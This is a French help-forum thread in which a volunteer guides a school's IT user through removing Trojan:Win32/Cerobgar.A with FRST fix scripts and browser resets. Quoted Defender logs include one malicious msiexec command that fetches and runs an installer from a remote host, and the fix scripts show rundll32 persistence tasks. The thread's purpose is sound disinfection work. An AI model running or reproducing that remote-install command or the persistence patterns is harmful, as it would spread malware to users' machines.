Trojan:Win32/Cerobgar.A et Probleme de double accent "^^" et double trema "¨¨" : Keylogger [résolu]

[ThomasH]

Bonjour

Windows Defender détecte Trojan:Win32/Cerobgar.A et j'ai un problème de double accent circonflexe.

Voici mes rapports (FRST - ADDITION - SHORTCUT)

D'ores et déjà merci pour votre aide

https://pjjoint.malekal.com/files.php?i ... 15x8i11h13

https://pjjoint.malekal.com/files.php?i ... e79d9r8o13

https://pjjoint.malekal.com/files.php?i ... 15z14z6g12

Thomas de l'école Don Bosco Verviers

[Malekal_morte]

Salut,

Oui il y a des malwares.



Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
2022-02-21 21:48 - 2022-01-10 15:26 - 000000000 ___HD C:\ProgramData\Qedyde
CHR Extension: (USkipMovie) - C:\ProgramData\Qedyde\Jglmge [2022-01-10]
C:\Program Files (x86)\DeploymentTops
Task: {0A0CC631-BC8E-4AF4-8737-30FC4FB25605} - System32\Tasks\Microsoft\Windows\CertificateServicesClient\colorcvtridge => rundll32.exe "C:\Program Files (x86)\DeploymentTops\VeraPolipies\wscrionAd_3_psp.dll",WpaCosnfy_WSMsibd
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
End:

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)



2) réinitialiser les navigateurs:
==================================
Réinitialise tes navigateurs et/ou re-paramètre manuellement tes navigateurs WEB ( page de démarrage, moteur de recherche, etc ) mais aussi supprimer/désactiver les extensions inutiles/parasites.
Pour t'aider à effectuer ce ménage, clique ci-dessous sur le nom du navigateur WEB que tu utilises :

• Réparer Mozilla Firefox (premier paragraphe)
• Réparer Google Chrome (premier paragraphe)
• Comment réparer ou réinitialiser Microsoft Edge
• Comment réparer ou réinitialiser Brave

[ThomasH]

Merci beaucoup ! Le problème est résolu avec votre correctif

Thomas

[Malekal_morte]

Super,

Pour terminer, à lire : que faire après une attaque de virus informatique.
Change tes mots de passe et suis les instructions pour la bonne conduite pour ne plus te faire infecter.

Pour éviter les virus, il faut savoir comment les pirates s'y prennent pour infecter les ordinateurs : Comment les virus informatiques sont distribués
Enfin pour protéger ton PC : Comment protéger son PC des virus et des pirates ?

[ThomasH]

Bonjour,

Le pc original qui a été infecté a été nettoyé avec la procédure ci dessus.
Néanmoins, d'autres pcs dans notre école présentent les mêmes symptômes. J'ai également exécuté le script via FRST mais celui-ci a été inefficace sur certains pcs.

Je vous transmets l'analyse du FRST d'un autre poste dont la menace n'a pas encore été éradiquée (FRST - ADDITION - SHORTCUT)
Pourriez-vous identifier si l'origine est différente?

https://pjjoint.malekal.com/files.php?i ... 7j5i14b125

https://pjjoint.malekal.com/files.php?i ... z11q7u7o15

https://pjjoint.malekal.com/files.php?i ... 814m9h11r6

D'ores et déjà, un grand merci.
Thomas

[Malekal_morte]

Ouaip infecté aussi :

Date: 2022-02-21 21:22:50
Description:
Antivirus Microsoft Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Nom : Trojan:Win32/Cerobgar.A
ID : 2147813239
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : CmdLine:_C:\Windows\System32\msiexec.exe -Q-IHtTP://GlNJ.NL:8080/rjbrXyMDHu4
Origine de la détection : Inconnu
Type de détection : Concret
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la veille de sécurité : AV: 1.359.627.0, AS: 1.359.627.0, NIS: 1.359.627.0
Version du moteur : AM: 1.1.18900.3, NIS: 1.1.18900.3

Date: 2022-01-27 19:47:41
Description:
Antivirus Microsoft Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
Nom : Trojan:Win32/Sabsik.TE.A!ml
ID : 2147780193
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : file:_C:\Users\segol\AppData\Local\Temp\baovsml.dmp; regkey:[email protected]\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\mvbdof; runonce:[email protected]\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\mvbdof
Origine de la détection : Ordinateur local
Type de détection : Chemin rapide
Source de détection : Protection en temps réel
Utilisateur : LAPTOP-JEPTAFND\segol
Nom du processus : C:\Windows\SysWOW64\msiexec.exe
Version de la veille de sécurité : AV: 1.355.2459.0, AS: 1.355.2459.0, NIS: 1.355.2459.0
Version du moteur : AM: 1.1.18800.4, NIS: 1.1.18800.4

Peut-être désinstaller McAfee après le nettoyage FRST, il est assez bof.



Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
Task: {46F422C7-BEC6-458E-83D1-779A97EF8F2E} - System32\Tasks\Microsoft\Windows\RemoteApp and Desktop Connections Update\Microsoft.Windows040e => C:\WINDOWS\SysWOW64\rundll32 C:\Users\segol\AppData\Local\LogoCenter\FzftectExtensions\GEU32conId_MM0AE.dll mjpualOaslc_Camjaqiaility
C:\Users\segol\AppData\Local\LogoCenter
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
End:

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)

[ThomasH]

Bonjour,

Je me permets de revenir vers vous concernant cette infection.
Elle semble prendre plusieurs formes et les scripts de dépannage proposés ci-dessous ne sont pas tous efficaces.

Existe t'il un AV qui est capable de détecter cette infection et la supprimer? A ce jour, ni Windows Defender, ni NOD32 ne l'arrête.

Voici une nouvelle analyse, puis-je vous demander de vérifier si le pc est infecté?

FRST : https://pjjoint.malekal.com/files.php?i ... 7j8c8z1012
ADDITION : https://pjjoint.malekal.com/files.php?i ... 13o9m7y156
SHORTCUT : https://pjjoint.malekal.com/files.php?i ... c6h7w14q10

D'ores et déjà un grand merci.
Thomas H

[Malekal_morte]

Salut,

Tu reviens mais tu n'es pas allé au bout de la désinfection précédente...
Donc le malware est encore là.
Pourquoi chercher un antivirus ? Le problème est le téléchargement de crack.

Bon après ça ne semble pas être le même PC.

Désinstalle tout cela, ça ne sert à rien à part ralentir le PC :

Avast SecureLine VPN
CyberLink
Dropbox (utile?)
McAfee LiveSafe
WildTangent Games

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
Task: {AAA0DD42-6472-49CF-AF78-C194E6E8C826} - System32\Tasks\Microsoft\Windows\RemoteApp and Desktop Connections Update\AWDENers => rundll32 C:\Users\Anne\AppData\Local\OPENFU~1\PINSGR~1\ZMDBOS~1.DLL,oakjrity_AzDolnc
C:\Users\Anne\AppData\Local\OPENFU~1
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
End:

Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)